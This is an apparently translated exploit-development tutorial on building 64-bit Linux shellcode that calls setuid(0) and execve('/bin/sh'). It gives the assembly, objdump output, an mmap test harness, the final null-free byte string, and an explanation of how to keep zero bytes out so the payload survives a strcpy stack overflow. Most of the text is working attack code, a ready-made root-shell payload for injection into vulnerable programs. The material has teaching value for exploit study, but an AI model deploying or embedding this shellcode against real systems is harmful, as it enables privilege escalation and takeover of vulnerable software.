Shellcode is a sequence of machine-code bytes (opcodes) that a target program can be made to execute. Because it drives registers and system calls directly, it is written as raw opcode bytes, usually expressed in hexadecimal.
Since it is an attack payload, the main job of shellcode is to invoke system calls, and on x86 Linux there are two ways to do that.
The first is the legacy software interrupt int 0x80, which traps into the kernel using the 32-bit convention (syscall number in eax, arguments in ebx, ecx, edx, ...).
The second is the dedicated fast system-call instructions: syscall on 64-bit (number in rax, arguments in rdi, rsi, rdx, r10, r8, r9, result returned in rax) and sysenter on 32-bit. These are CPU instructions, not libc functions; libc's own wrappers use them underneath.
For 64-bit Linux, syscall is the one to use. Since shellcode is nothing more than the hex bytes of such instructions, the workflow is: write the assembly, assemble and link it into an executable, run it to confirm it works, and then read the opcode bytes back out with a disassembler.
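To make the register convention concrete, here is an added example (not code from the original post) that issues Linux system calls from a 64-bit C program without libc's wrappers, the same way the shellcode later on the page does. It assumes an x86-64 Linux build; the raw_syscall3, raw_int80_0, pid_via_syscall and pid_via_int80 helper names are mine. The int 0x80 path from a 64-bit process only works when the kernel was built with CONFIG_IA32_EMULATION, which is why it is demonstrated only in main and not relied on.

```c
// Added example (not from the original post): raw Linux system calls from a
// 64-bit process, without libc wrappers. x86-64 only.
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

#if !defined(__x86_64__)
#error "this example is x86-64 only"
#endif

// Three-argument system call through the 64-bit `syscall` instruction.
// x86-64 ABI: number in rax, args in rdi, rsi, rdx, result in rax.
// The instruction itself clobbers rcx and r11, so they are declared.
static long raw_syscall3(long nr, long a1, long a2, long a3)
{
    long ret;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "a"(nr), "D"(a1), "S"(a2), "d"(a3)
                      : "rcx", "r11", "memory");
    return ret;
}

// Zero-argument call through the legacy 32-bit gate. From a 64-bit process
// this uses the i386 syscall table (getpid is 20 there, not 39) and needs
// CONFIG_IA32_EMULATION in the kernel; otherwise the process gets SIGSEGV.
static long raw_int80_0(long nr)
{
    long ret;
    __asm__ volatile ("int $0x80" : "=a"(ret) : "a"(nr) : "memory");
    return ret;
}

// SYS_getpid is 39 on x86-64 (from <sys/syscall.h>).
long pid_via_syscall(void) { return raw_syscall3(SYS_getpid, 0, 0, 0); }
// 20 is getpid in the i386 table.
long pid_via_int80(void)   { return raw_int80_0(20); }

int main(void)
{
    printf("libc getpid():      %ld\n", (long)getpid());
    printf("syscall, rax=39:    %ld\n", pid_via_syscall());
    printf("int 0x80, eax=20:   %ld\n", pid_via_int80());

    // write(1, msg, len) with the same helper: rdi=fd, rsi=buf, rdx=len
    static const char msg[] = "hello from a raw syscall\n";
    raw_syscall3(SYS_write, 1, (long)msg, (long)sizeof msg - 1);
    return 0;
}
```

All three getpid variants print the same number on a kernel with 32-bit emulation enabled; the point is that the two mechanisms use different syscall numbering tables, so shellcode for a 64-bit target must use the x86-64 numbers with syscall, which is what the assembly below does.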
Since we want to gain root and then get a shell, the usual payload is the following C program (the Linux background is not discussed here). Note that setuid(0) only succeeds when the process already has the privilege to change its uid, for example when it runs as root or from a setuid-root binary; otherwise it fails with EPERM and the shell simply runs with the caller's uid.
shell.c

    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        char *argv[] = { "/bin/sh", NULL };   /* same argv the assembly builds on the stack */
        setuid(0);                            /* become root (only succeeds if permitted) */
        execve("/bin/sh", argv, NULL);        /* replace this process with a shell */
        return 0;
    }
The corresponding assembly (NASM syntax) is:

    global _start
    _start:
        xor rdi, rdi                    ; uid = 0
        xor rax, rax
        mov al, 0x69                    ; rax = 105 = setuid (no zero bytes, unlike mov rax, 0x69)
        syscall
        xor rdx, rdx                    ; envp = NULL
        mov rbx, 0x68732f6e69622fff     ; "/bin/sh" packed with a 0xff pad byte, so the immediate has no NUL
        shr rbx, 0x8                    ; drop the pad: rbx now holds "/bin/sh\0"
        push rbx
        mov rdi, rsp                    ; rdi = pointer to "/bin/sh"
        xor rax, rax
        push rax                        ; argv terminator (NULL)
        push rdi                        ; argv[0] = "/bin/sh"
        mov rsi, rsp                    ; rsi = argv
        mov al, 0x3b                    ; rax = 59 = execve
        syscall
This is not what you get by disassembling shell.c; it was written by hand with reference to other material (the original post links to it).
The assembly is not yet shellcode that can be executed from a payload, but by assembling it into an executable we can read off the opcodes we need.
    nasm -f elf64 shell.asm
    ld -o shell shell.o
    objdump -d shell

Note: use -f elf64 on 64-bit and -f elf32 on 32-bit.
The results of using Objdump are as follows:
    shell:     file format elf64-x86-64

    Disassembly of section .text:

    0000000000400080 <_start>:
      400080:   48 31 ff                xor    %rdi,%rdi
      400083:   48 31 c0                xor    %rax,%rax
      400086:   b0 69                   mov    $0x69,%al
      400088:   0f 05                   syscall
      40008a:   48 31 d2                xor    %rdx,%rdx
      40008d:   48 bb ff 2f 62 69 6e    mov    $0x68732f6e69622fff,%rbx
      400094:   2f 73 68
      400097:   48 c1 eb 08             shr    $0x8,%rbx
      40009b:   53                      push   %rbx
      40009c:   48 89 e7                mov    %rsp,%rdi
      40009f:   48 31 c0                xor    %rax,%rax
      4000a2:   50                      push   %rax
      4000a3:   57                      push   %rdi
      4000a4:   48 89 e6                mov    %rsp,%rsi
      4000a7:   b0 3b                   mov    $0x3b,%al
      4000a9:   0f 05                   syscall
The hex bytes in the middle column, from 48 31 ff through the final 0f 05 (43 bytes in all), are the executable opcodes we need.
Now write a small program to test the opcodes:
shelltest.c

    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>

    char *shellcode =
        "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"
        "\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
        "\x48\xc1\xeb\x08\x53\x48\x89\xe7"
        "\x48\x31\xc0\x50\x57\x48\x89\xe6"
        "\xb0\x3b\x0f\x05";

    int main(void)
    {
        size_t len = strlen(shellcode);     /* works only because the bytes contain no 0x00 */
        fprintf(stdout, "Length: %zu\n", len);

        /* The string literal lives in read-only, non-executable memory on current
           toolchains, so jumping to it directly would fault. Copy the bytes into a
           mapping that is explicitly executable, then call it as a function. */
        void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (mem == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
        memcpy(mem, shellcode, len);
        (*(void (*)(void))mem)();           /* does not return if execve succeeds */
        return 0;
    }
    gcc -o shelltest shelltest.c
    ./shelltest

Run it and we drop into a shell. If the tester is not running as root, the setuid(0) call fails silently and the shell runs with the current uid; the execve still succeeds, so the test proves the bytes are correct even without privilege.
\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
is the shellcode we want to execute.
Caution: not every shellcode that runs in a test harness is usable in an attack. A system call may not be available in the target environment, and, most importantly, the opcodes must not contain any 0x00 byte. Why? Because when we construct a stack overflow we are abusing dangerous functions such as strcpy, and those functions treat 0x00 as the string terminator, so the copy stops there and the payload is truncated. That is why the assembly above uses xor rax, rax / mov al, imm8 instead of mov rax, imm32 (whose encoding contains zero bytes) and pads the "/bin/sh" constant with 0xff before shifting it: both avoid zero bytes in the opcodes.
Stack Overflow Attack series: Shellcode root access in Linux x86 64-bit attacks (ii) shellcode